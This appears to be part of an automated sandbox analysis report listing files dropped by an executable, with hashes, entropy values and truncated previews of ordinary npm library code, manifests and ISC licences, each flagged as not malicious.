              Preview:'use strict'..const fs = require('fs').const path = require('path').const EE = require('events').EventEmitter.const Minimatch = require('minimatch').Minimatch..class Walker extends EE {. constructor (opts) {. opts = opts || {}. super(opts). // set to true if this.path is a symlink, whether follow is true or not. this.isSymbolicLink = opts.isSymbolicLink. this.path = opts.path || process.cwd(). this.basename = path.basename(this.path). this.ignoreFiles = opts.ignoreFiles || ['.ignore']. this.ignoreRules = {}. this.parent = opts.parent || null. this.includeEmpty = !!opts.includeEmpty. this.root = this.parent ? this.parent.root : this.path. this.follow = !!opts.follow. this.result = this.parent ? this.parent.result : new Set(). this.entries = null. this.sawError = false. }.. sort (a, b) {. return a.localeCompare(b, 'en'). }.. emit (ev, data) {. let ret = false. if (!(this.sawError && ev === 'error')) {. if (ev === 'error') {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1567
              Entropy (8bit):4.751696630030578
              Encrypted:false
              SSDEEP:
              MD5:7D4CE02772F12D23B64076A208BEC197
              SHA1:804BAEC474B8EF41E439230C974D501CBFB38FCE
              SHA-256:9F48DB42DAFE38FFDB9193E564DD03D8AAF3D66CAC80AD8143F4C6DEE4E1C277
              SHA-512:91573F56587412A1B4F75797FEEEA6D6D82422A5A1F60F8C147F16081BFBBEFAF8188D5708E05B463ED4BB596776786A122C90B42CD79B595FA6FDF7ECF23FA0
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "ignore-walk",. "version": "6.0.3",. "description": "Nested/recursive `.gitignore`/`.npmignore` parsing and filtering.",. "main": "lib/index.js",. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.14.1",. "mutate-fs": "^2.1.1",. "tap": "^16.0.1". },. "scripts": {. "test": "tap",. "posttest": "npm run lint",. "lint": "eslint \"**/*.js\"",. "lintfix": "npm run lint -- --fix",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "test:windows-coverage": "npm pkg set tap.statements=99 --json && npm pkg set tap.branches=98 --json && npm pkg set tap.lines=99 --json",. "snap": "tap". },. "keywords": [. "ignorefile",. "ignore",. "file",. ".gitignore",. ".npmignore",. "glob". ],. "author": "GitHub Inc.",. "license": "ISC",. "repository": {. "type": "git",. "url": "https://github.com/npm/ignore-walk.git". },. "files": [. "bin/",. "lib/
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:HTML document, ASCII text
              Category:dropped
              Size (bytes):4412
              Entropy (8bit):4.50876466406389
              Encrypted:false
              SSDEEP:
              MD5:929EFBC5C5675BC0E4D2B544FEC5D84C
              SHA1:A409233F0435A13AD4905543DFAE94E3F950916C
              SHA-256:45368BFE11080C4504B7804602015D93873303C5B13D5710AF6C42E9ABC35B4A
              SHA-512:4DDF2A2F4933E9652E5CDDFD5317F9793535D7BAD913F9822FAD8813B2ADD224DBE9096714D94A9F0EB3B7692BA7D954ACDE153F578A3D35EADA1542AF2A9CE0
              Malicious:false
              Reputation:unknown
              Preview:/**. * @preserve. * JS Implementation of incremental MurmurHash3 (r150) (as of May 10, 2013). *. * @author <a href="mailto:jensyt@gmail.com">Jens Taylor</a>. * @see http://github.com/homebrewing/brauhaus-diff. * @author <a href="mailto:gary.court@gmail.com">Gary Court</a>. * @see http://github.com/garycourt/murmurhash-js. * @author <a href="mailto:aappleby@gmail.com">Austin Appleby</a>. * @see http://sites.google.com/site/murmurhash/. */.(function(){. var cache;.. // Call this function without `new` to use the cached object (good for. // single-threaded environments), or with `new` to create a new object.. //. // @param {string} key A UTF-16 or ASCII string. // @param {number} seed An optional positive integer. // @return {object} A MurmurHash3 object for incremental hashing. function MurmurHash3(key, seed) {. var m = this instanceof MurmurHash3 ? this : cache;. m.reset(seed). if (typeof key === 'string' && key.length > 0) {. m.ha
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:HTML document, ASCII text, with very long lines (1452)
              Category:dropped
              Size (bytes):1894
              Entropy (8bit):5.469301776337895
              Encrypted:false
              SSDEEP:
              MD5:52D2EB410DE1C9E0758EF562289289FA
              SHA1:806132E53D0E6D94BCB3A492AA05BC4078578C13
              SHA-256:EA8490563A229B89F2B779217938F9EB2BCF93DD89DE9F7FC5C035632F0934B5
              SHA-512:5BD2D78DDFFACA26F8388296AD30E80288C51E67409A98D6B9D7DEE2AD8391CD229663AAE8B4FC0FCB196DF95534A33E4CA088F03D9F61AC94A7D7BA84E61360
              Malicious:false
              Reputation:unknown
              Preview:/**. * @preserve. * JS Implementation of incremental MurmurHash3 (r150) (as of May 10, 2013). *. * @author <a href="mailto:jensyt@gmail.com">Jens Taylor</a>. * @see http://github.com/homebrewing/brauhaus-diff. * @author <a href="mailto:gary.court@gmail.com">Gary Court</a>. * @see http://github.com/garycourt/murmurhash-js. * @author <a href="mailto:aappleby@gmail.com">Austin Appleby</a>. * @see http://sites.google.com/site/murmurhash/. */.!function(){function t(h,r){var s=this instanceof t?this:e;return s.reset(r),"string"==typeof h&&h.length>0&&s.hash(h),s!==this?s:void 0}var e;t.prototype.hash=function(t){var e,h,r,s,i;switch(i=t.length,this.len+=i,h=this.k1,r=0,this.rem){case 0:h^=i>r?65535&t.charCodeAt(r++):0;case 1:h^=i>r?(65535&t.charCodeAt(r++))<<8:0;case 2:h^=i>r?(65535&t.charCodeAt(r++))<<16:0;case 3:h^=i>r?(255&t.charCodeAt(r))<<24:0,h^=i>r?(65280&t.charCodeAt(r++))>>8:0}if(this.rem=3&i+this.rem,i-=this.rem,i>0){for(e=this.h1;;){if(h=4294967295&11601*h+3432906752*(65535&h),h=h
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):818
              Entropy (8bit):4.646071442250116
              Encrypted:false
              SSDEEP:
              MD5:FEB3F37F4780F79E5FDB5FF0870F1057
              SHA1:A28F2B413385AF4188C4FC0AD1E0C38C2CD03CF4
              SHA-256:AA3B07E7FA3D63AA96E401C3842B8CCA1DD3247954BAF92377094766E903C185
              SHA-512:A07698772A4A6D86E5E741114E02E66B6CAFE0427262C41CD041D02BD49C89CF1DAC07C3BE6D13AAA7B1547C8650273DDBFE6FC76FE1F461875DAC6A4FBEBF41
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "imurmurhash",. "version": "0.1.4",. "description": "An incremental implementation of MurmurHash3",. "homepage": "https://github.com/jensyt/imurmurhash-js",. "main": "imurmurhash.js",. "files": [. "imurmurhash.js",. "imurmurhash.min.js",. "package.json",. "README.md". ],. "repository": {. "type": "git",. "url": "https://github.com/jensyt/imurmurhash-js". },. "bugs": {. "url": "https://github.com/jensyt/imurmurhash-js/issues". },. "keywords": [. "murmur",. "murmurhash",. "murmurhash3",. "hash",. "incremental". ],. "author": {. "name": "Jens Taylor",. "email": "jensyt@gmail.com",. "url": "https://github.com/homebrewing". },. "license": "MIT",. "dependencies": {. },. "devDependencies": {. },. "engines": {. "node": ">=0.8.19". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):743
              Entropy (8bit):4.919079707072532
              Encrypted:false
              SSDEEP:
              MD5:E8FD0920F2F01FE6D1F99EFBD7B5619E
              SHA1:9C4D9C2ACD8FCFF21A0B3BE049CAEB37E0DB31BD
              SHA-256:06FC10FB7018BD156B34B1443D67D0E1FF1986E534878B493EF6095D675EBF33
              SHA-512:3544D70C4D84DBA0020166EBD689BEDC4EC4653C6B8775D7174104FA8773C4BB462C88C5847B858AC8EBFD825171E039E8D8F59A6A56765C07AF454E63FE731E
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..module.exports = (string, count = 1, options) => {..options = {...indent: ' ',...includeEmptyLines: false,......options..};...if (typeof string !== 'string') {...throw new TypeError(....`Expected \`input\` to be a \`string\`, got \`${typeof string}\``...);..}...if (typeof count !== 'number') {...throw new TypeError(....`Expected \`count\` to be a \`number\`, got \`${typeof count}\``...);..}...if (typeof options.indent !== 'string') {...throw new TypeError(....`Expected \`options.indent\` to be a \`string\`, got \`${typeof options.indent}\``...);..}...if (count === 0) {...return string;..}...const regex = options.includeEmptyLines ? /^/gm : /^(?!\s*$)/gm;...return string.replace(regex, options.indent.repeat(count));.};.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):582
              Entropy (8bit):4.696034353347338
              Encrypted:false
              SSDEEP:
              MD5:2CAE52047BBCAD559E6B4FBF86A9D8C1
              SHA1:8E67654392F062EBC5CD54E0F7D06427700E73B9
              SHA-256:5B15D951490EA56F6309D9203E1C3CFD036AD1C67CA1C7F372CBFDFBF3FAECB7
              SHA-512:12639FB1808C03E60BFC131CAECA5181FE7E0C47CE43737FCC7781CEFC0FCF03175CCCC1358FEE90C53073D69FA660A6F8B0E442C6390E6419BA966479D50641
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "indent-string",.."version": "4.0.0",.."description": "Indent each line in a string",.."license": "MIT",.."repository": "sindresorhus/indent-string",.."author": {..."name": "Sindre Sorhus",..."email": "sindresorhus@gmail.com",..."url": "sindresorhus.com"..},.."engines": {..."node": ">=8"..},.."scripts": {..."test": "xo && ava && tsd"..},.."files": [..."index.js",..."index.d.ts"..],.."keywords": [..."indent",..."string",..."pad",..."align",..."line",..."text",..."each",..."every"..],.."devDependencies": {..."ava": "^1.4.1",..."tsd": "^0.7.2",..."xo": "^0.24.0"..}.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):748
              Entropy (8bit):4.9874659390608365
              Encrypted:false
              SSDEEP:
              MD5:90A3CA01A5EFED8B813A81C6C8FA2E63
              SHA1:515EC4469197395143DD4BFE9B1BC4E0D9B6B12A
              SHA-256:05DC4D785AC3A488676D3ED10E901B75AD89DAFCC63F8E66610FD4A39CC5C7E8
              SHA-512:C9D6162BEF9880A5AB6A5AFE96F3EC1BD9DEAD758CA427F9BA2E8E9D9ADAAF5649AAD942F698F39B7A9A437984F8DC09141F3834CD78B03104F81AD908D15B31
              Malicious:false
              Reputation:unknown
              Preview:The ISC License..Copyright (c) Isaac Z. Schlueter..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR.ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN.ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR.IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1365
              Entropy (8bit):4.532656057305566
              Encrypted:false
              SSDEEP:
              MD5:42BBC3622ABFEFCA5862FD0D12441A15
              SHA1:84AED0B47C15DE35A85A5AA6C641342BA4DD5A88
              SHA-256:E33EA098A91D2C41BE886FBBCECACB9799FE183D8A446F138A4786CB3D809802
              SHA-512:1B832AE6EF12DF389DC5028CCD80DC811EAB5D4816DB87BA8E531EA47A2097A26801C14F15E0E736C94C665964D23E55E58750FCFF7693166B2ADB1F7D582C89
              Malicious:false
              Reputation:unknown
              Preview:var wrappy = require('wrappy').var reqs = Object.create(null).var once = require('once')..module.exports = wrappy(inflight)..function inflight (key, cb) {. if (reqs[key]) {. reqs[key].push(cb). return null. } else {. reqs[key] = [cb]. return makeres(key). }.}..function makeres (key) {. return once(function RES () {. var cbs = reqs[key]. var len = cbs.length. var args = slice(arguments).. // XXX It's somewhat ambiguous whether a new callback added in this. // pass should be queued for later execution if something in the. // list of callbacks throws, or if it should just be discarded.. // However, it's such an edge case that it hardly matters, and either. // choice is likely as surprising as the other.. // As it happens, we do go ahead and schedule it for later execution.. try {. for (var i = 0; i < len; i++) {. cbs[i].apply(null, args). }. } finally {. if (cbs.length > len) {. // added more in the interim..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):658
              Entropy (8bit):4.711251688823241
              Encrypted:false
              SSDEEP:
              MD5:85BA25624378C23E1EE9B33D3D103BF0
              SHA1:40E50820BEED8BFEE8CE186D5BE617A8C213E7E1
              SHA-256:5F2489E13F73E9EBAD999134FAE8A591F6D8B58E8341EC8E3B33397C4D1EF817
              SHA-512:FA5CC51E5A46B5BE8E9538812AD1A719792C7F7B4426210A840D1DF18D85452D1E27B2A64EC7B0149D5EA61FFE0E27FD0319C84C0CD4945CBAA6B4E7F66E545F
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "inflight",. "version": "1.0.6",. "description": "Add callbacks to requests in flight to avoid async duplication",. "main": "inflight.js",. "files": [. "inflight.js". ],. "dependencies": {. "once": "^1.3.0",. "wrappy": "1". },. "devDependencies": {. "tap": "^7.1.2". },. "scripts": {. "test": "tap test.js --100". },. "repository": {. "type": "git",. "url": "https://github.com/npm/inflight.git". },. "author": "Isaac Z. Schlueter <i@izs.me> (http://blog.izs.me/)",. "bugs": {. "url": "https://github.com/isaacs/inflight/issues". },. "homepage": "https://github.com/isaacs/inflight",. "license": "ISC".}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):749
              Entropy (8bit):4.988275613873547
              Encrypted:false
              SSDEEP:
              MD5:5B2EF2247AF6D355AE9D9F988092D470
              SHA1:3B0E8D58A362B1787EF3504FBA4F593B22F3CEE4
              SHA-256:5FFE28E7ADE7D8F10D85D5337A73FD793DAC5C462FB9A28FBF8C5046C7FBCA3B
              SHA-512:6159FE6970CDB729DCC363BFE834924A6CDED6D4AA585F965E6D58B65C54D5E198A69B3C7D4E733964A3C1542A45808016D816CD89AC3919671C601BD2ED9785
              Malicious:false
              Reputation:unknown
              Preview:The ISC License..Copyright (c) Isaac Z. Schlueter..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH.REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND.FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,.INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM.LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR.OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR.PERFORMANCE OF THIS SOFTWARE...
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):250
              Entropy (8bit):4.647106694152876
              Encrypted:false
              SSDEEP:
              MD5:9CED637189714B8D21D34AEB50B42AE8
              SHA1:222DA288A07D8F65B2AED9B88815948CFE0B42D9
              SHA-256:BB380F32BEF5FEB18678F0F45F88073FED5D7A0069A309132CB2080CD553D5C7
              SHA-512:59925A20877C9193308E6766B96C11B6D910B45583C73498B8761B091231BCE2F4F7D95EB7D2B2E83D6B8A595689B80878C27E7C1E87347BA03F6CCB0C945CD1
              Malicious:false
              Reputation:unknown
              Preview:try {. var util = require('util');. /* istanbul ignore next */. if (typeof util.inherits !== 'function') throw '';. module.exports = util.inherits;.} catch (e) {. /* istanbul ignore next */. module.exports = require('./inherits_browser.js');.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):753
              Entropy (8bit):4.269212982212497
              Encrypted:false
              SSDEEP:
              MD5:184872B18B759A37285BEE13CD1CD0E4
              SHA1:70FCF71F449139ECBF7A5D6C78ECE069BBDF4DC3
              SHA-256:AD322A7B1DEC60F3D2EBDA2091816469EFB55B567D241CF3CF0FA4C5A4AFE500
              SHA-512:0B6F853387D1AD11BC77997F278F2503CE921A5F7049978BF60B63A1E9A772238EBEF67808C2132F35D6A198CB6432EB43B15769FF420B8DB64959CD0A9E50CF
              Malicious:false
              Reputation:unknown
              Preview:if (typeof Object.create === 'function') {. // implementation from standard node.js 'util' module. module.exports = function inherits(ctor, superCtor) {. if (superCtor) {. ctor.super_ = superCtor. ctor.prototype = Object.create(superCtor.prototype, {. constructor: {. value: ctor,. enumerable: false,. writable: true,. configurable: true. }. }). }. };.} else {. // old school shim for old browsers. module.exports = function inherits(ctor, superCtor) {. if (superCtor) {. ctor.super_ = superCtor. var TempCtor = function () {}. TempCtor.prototype = superCtor.prototype. ctor.prototype = new TempCtor(). ctor.prototype.constructor = ctor. }. }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):581
              Entropy (8bit):4.517825583313142
              Encrypted:false
              SSDEEP:
              MD5:F73908DAB55D4259F3ED052CE9FB2FBB
              SHA1:62B11DD736A0047FBD8D2DC0406D2118A549A359
              SHA-256:BE645800BC94FD8DE29C8AE91690549B316CC437100108AEEA7B2F347693CC80
              SHA-512:470B2FFBCBCAFB423D46C724D046B6471A7847F6C8A97158F4C22D26F429655BB40F3962026F7935741DDA6ED5E6449FB942537F610DF13D20892C5B6BB14A9D
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "inherits",. "description": "Browser-friendly inheritance fully compatible with standard node.js inherits()",. "version": "2.0.4",. "keywords": [. "inheritance",. "class",. "klass",. "oop",. "object-oriented",. "inherits",. "browser",. "browserify". ],. "main": "./inherits.js",. "browser": "./inherits_browser.js",. "repository": "git://github.com/isaacs/inherits",. "license": "ISC",. "scripts": {. "test": "tap". },. "devDependencies": {. "tap": "^14.2.4". },. "files": [. "inherits.js",. "inherits_browser.js". ].}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):7102
              Entropy (8bit):4.726353380304497
              Encrypted:false
              SSDEEP:
              MD5:CAB2565F53C40F1C0FD6AA2184D855E6
              SHA1:D509CC680D4120E40B2FE94FEF6B5FBD71B3E1C3
              SHA-256:C4A82B6B1C7D3AB59456E0F1D1EAF1EC09D630239BB8B3D0BC26164E32171D89
              SHA-512:D7B37CA811506694F3099D71D1CBE952930F96B82B65005ED3FFA49562F11281D43A72F73943B9D93E8AE4DFE0E4FAF9CFE74C9A2359705355C3704B7A33D1A8
              Malicious:false
              Reputation:unknown
              Preview:const { hasOwnProperty } = Object.prototype..const encode = (obj, opt = {}) => {. if (typeof opt === 'string') {. opt = { section: opt }. }. opt.align = opt.align === true. opt.newline = opt.newline === true. opt.sort = opt.sort === true. opt.whitespace = opt.whitespace === true || opt.align === true. // The `typeof` check is required because accessing the `process` directly fails on browsers.. /* istanbul ignore next */. opt.platform = opt.platform || (typeof process !== 'undefined' && process.platform). opt.bracketedArray = opt.bracketedArray !== false.. /* istanbul ignore next */. const eol = opt.platform === 'win32' ? '\r\n' : '\n'. const separator = opt.whitespace ? ' = ' : '='. const children = [].. const keys = opt.sort ? Object.keys(obj).sort() : Object.keys(obj).. let padToChars = 0. // If aligning on the separator, then padToChars is determined as follows:. // 1. Get the keys. // 2. Exclude keys pointing to objects unless the value is null or an array.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1035
              Entropy (8bit):4.650642780519553
              Encrypted:false
              SSDEEP:
              MD5:B3BF3DA8142287CB9A5F9D23417B124E
              SHA1:B905697034457FF4F8103095D9532EF55BF4E4D9
              SHA-256:3E55EA7DCE37DBA86A201249851CB24FFDD2E821C7F585501E462CF19C99198D
              SHA-512:87358DC3DDFEF6D68370705CFD65DB65427B34A00622DF459B43E79DA606FA3A17FFEACAE4312D4B0689BBFDC6DD0981196A8D38560A74ADB828C98D2314D1C2
              Malicious:false
              Reputation:unknown
              Preview:{. "author": "GitHub Inc.",. "name": "ini",. "description": "An ini encoder/decoder for node",. "version": "4.1.1",. "repository": {. "type": "git",. "url": "https://github.com/npm/ini.git". },. "main": "lib/ini.js",. "scripts": {. "eslint": "eslint",. "lint": "eslint \"**/*.js\"",. "lintfix": "npm run lint -- --fix",. "test": "tap",. "snap": "tap",. "posttest": "npm run lint",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force". },. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.15.1",. "tap": "^16.0.1". },. "license": "ISC",. "files": [. "bin/",. "lib/". ],. "engines": {. "node": "^14.17.0 || ^16.13.0 || >=18.0.0". },. "templateOSS": {. "//@npmcli/template-oss": "This file is partially managed by @npmcli/template-oss. Edits may be overwritten.",. "version": "4.15.1",. "publish": "true". },. "tap": {. "nyc-arg": [. "--exclude",.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):717
              Entropy (8bit):4.987985636498366
              Encrypted:false
              SSDEEP:
              MD5:1750B360DAEE1AA920366E344C1B0C57
              SHA1:FE739DC1A14A033680B3A404DF26E98CCA0B3CCF
              SHA-256:7F75BB21103E77B7ACFCF88A6AD0286741A18B5D13C4326160346E8CF7E356AD
              SHA-512:FF2486D589D32FB35AAD9C02CD917BA1E738CA16B7CCC7954CDC4712A968FC5FC25612B489F962CBE8DDB2BE40057CD1B59402AA9CADE9B6479A1D0E1D7743A4
              Malicious:false
              Reputation:unknown
              Preview:ISC License..Copyright npm, Inc...Permission to use, copy, modify, and/or distribute this.software for any purpose with or without fee is hereby.granted, provided that the above copyright notice and this.permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND NPM DISCLAIMS ALL.WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL.IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO.EVENT SHALL NPM BE LIABLE FOR ANY SPECIAL, DIRECT,.INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,.WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER.TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE.USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):6552
              Entropy (8bit):4.7818555477007125
              Encrypted:false
              SSDEEP:
              MD5:6CFD455FA2021AC2E4A7A6EA9DB154CD
              SHA1:BC029AF8B541AF5083BD6AFDD7EBDBA6A23BF6FF
              SHA-256:753F7BDF5A2ED07A8AFFBBBBEC17837A9D21058E1B80DAAB5B84CF1BBC1C4606
              SHA-512:08828689560CAF507C4DEFE60C1487479CD768B9EADA72889FBD822BDB3C918AF8F715732768769F4BD229BE7CA240A877A88BB3B251DA7255F30ADDBA27CB76
              Malicious:false
              Reputation:unknown
              Preview:/* globals config, dirname, package, basename, yes, prompt */..const fs = require('fs/promises').const path = require('path').const validateLicense = require('validate-npm-package-license').const validateName = require('validate-npm-package-name').const npa = require('npm-package-arg').const semver = require('semver')..// more popular packages should go here, maybe?.const isTestPkg = (p) => !!p.match(/^(expresso|mocha|tap|coffee-script|coco|streamline)$/)..const invalid = (msg) => Object.assign(new Error(msg), { notValid: true })..const readDeps = (test, excluded) => async () => {. const dirs = await fs.readdir('node_modules').catch(() => null).. if (!dirs) {. return. }.. const deps = {}. for (const dir of dirs) {. if (dir.match(/^\./) || test !== isTestPkg(dir) || excluded[dir]) {. continue. }.. const dp = path.join(dirname, 'node_modules', dir, 'package.json'). const p = await fs.readFile(dp, 'utf8').then((d) => JSON.parse(d)).catch(() => null).. if (!p ||
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3987
              Entropy (8bit):4.853650982685634
              Encrypted:false
              SSDEEP:
              MD5:DD08D02C9519B389F23906BE6D43E34A
              SHA1:2B869C52DD4DA17CADD35E8965CC86DACEC73ECF
              SHA-256:DC8FA9DF8DA9114CE1DA747169D702EFCF6F30FF10D7B897F85FF43AAFF79F6D
              SHA-512:E85ED188BC96C0030DEFD5649AB640406725EBFFAA7D6FED83AAE651043904C89F120BEF8F1F160BA0F2F4175E2E14F877BD15BADF01AB687A3D971523426596
              Malicious:false
              Reputation:unknown
              Preview:.const promzard = require('promzard').const path = require('path').const fs = require('fs/promises').const semver = require('semver').const read = require('read').const util = require('util').const rpj = require('read-package-json')..const def = require.resolve('./default-input.js')..// to validate the data object at the end as a worthwhile package.// and assign default values for things..const _extraSet = rpj.extraSet.const _rpj = util.promisify(rpj).const _rpjExtras = util.promisify(rpj.extras).const readPkgJson = async (file, pkg) => {. // only do a few of these. no need for mans or contributors if they're in the files. rpj.extraSet = _extraSet.filter(f => f.name !== 'authors' && f.name !== 'mans'). const p = pkg ? _rpjExtras(file, pkg) : _rpj(file). return p.catch(() => ({})).finally(() => rpj.extraSet = _extraSet).}..const isYes = (c) => !!(c.get('yes') || c.get('y') || c.get('force') || c.get('f'))..const getConfig = (c = {}) => {. // accept either a plain-jane object, or a
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1668
              Entropy (8bit):4.674818834875887
              Encrypted:false
              SSDEEP:
              MD5:B740516EF2BCE003C60D15A44879BDA1
              SHA1:7630455FCEAA3B8142CC8E4AAADCF225EF65E161
              SHA-256:5E9B93AC1853A094A04400EB19E13FCE127E51084EBFDD86258F967E6818B44F
              SHA-512:2B4916EFD364807A20D34814A26EFDEEBE176945E3B5732DD9D36CA370C2830741D184348BDF10FF754D2085E9FB5B745162A996F6C6D0D10E1F6D4C5CE99A17
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "init-package-json",. "version": "6.0.0",. "main": "lib/init-package-json.js",. "scripts": {. "test": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "lintfix": "npm run lint -- --fix",. "snap": "tap",. "posttest": "npm run lint",. "template-oss-apply": "template-oss-apply --force". },. "repository": {. "type": "git",. "url": "https://github.com/npm/init-package-json.git". },. "author": "GitHub Inc.",. "license": "ISC",. "description": "A node module to get your node module started",. "dependencies": {. "npm-package-arg": "^11.0.0",. "promzard": "^1.0.0",. "read": "^2.0.0",. "read-package-json": "^7.0.0",. "semver": "^7.3.5",. "validate-npm-package-license": "^3.0.4",. "validate-npm-package-name": "^5.0.0". },. "devDependencies": {. "@npmcli/config": "^7.0.0",. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.18.0",. "tap": "^16.0.1". },. "engines": {. "node"
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2168
              Entropy (8bit):5.041686121311911
              Encrypted:false
              SSDEEP:
              MD5:681C97E9F250BA41408CF2E1053B3EF9
              SHA1:CECA6DF259863546BAE6D826C65040C0FF2285D0
              SHA-256:949FCF61D7981758349F79E717C29C9864DB92004A1FA1A3FD7DC9198F148504
              SHA-512:856AA861D9BFDB2C4DECA4521CD06F59C35077B430737C8C30963E4BA6790ADC25EA0A242AF91EFCAE688A24733B3A974ACD1108258B165CAE3FDDBD4A5157BD
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..const word = '[a-fA-F\\d:]';.const b = options => options && options.includeBoundaries ?..`(?:(?<=\\s|^)(?=${word})|(?<=${word})(?=\\s|$))` :..'';..const v4 = '(?:25[0-5]|2[0-4]\\d|1\\d\\d|[1-9]\\d|\\d)(?:\\.(?:25[0-5]|2[0-4]\\d|1\\d\\d|[1-9]\\d|\\d)){3}';..const v6seg = '[a-fA-F\\d]{1,4}';.const v6 = `.(?:.(?:${v6seg}:){7}(?:${v6seg}|:)| // 1:2:3:4:5:6:7:: 1:2:3:4:5:6:7:8.(?:${v6seg}:){6}(?:${v4}|:${v6seg}|:)| // 1:2:3:4:5:6:: 1:2:3:4:5:6::8 1:2:3:4:5:6::8 1:2:3:4:5:6::1.2.3.4.(?:${v6seg}:){5}(?::${v4}|(?::${v6seg}){1,2}|:)| // 1:2:3:4:5:: 1:2:3:4:5::7:8 1:2:3:4:5::8 1:2:3:4:5::7:1.2.3.4.(?:${v6seg}:){4}(?:(?::${v6seg}){0,1}:${v4}|(?::${v6seg}){1,3}|:)| // 1:2:3:4:: 1:2:3:4::6:7:8 1:2:3:4::8 1:2:3:4::6:7:1.2.3.4.(?:${v6seg}:){3}(?:(?::${v6seg}){0,2}:${v4}|(?::${v6seg}){1,4}|:)| // 1:2:3:: 1:2:3::5:6:7:8 1:2:3::8 1:2:3::5:6:7:1.2.3.4.(?:${v6se
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):685
              Entropy (8bit):4.763763708946622
              Encrypted:false
              SSDEEP:
              MD5:9F935D92510DD5FF83843F759B9F09D6
              SHA1:9A5C770C2159DE4C17B7A7CC478BE4A9E63F7B9E
              SHA-256:F3B8812D81F361B82C6D1299D394ECD5E835BE711EE460921AC79F9409788354
              SHA-512:F0771B60AFA8A3769E80752A6747A83F199D6A022AD002720D0F3AE107CAB13C4E54603486A9318078FCAD91D406A21C34F22424F0D7A517B3CED037CDE63A5A
              Malicious:false
              Reputation:unknown
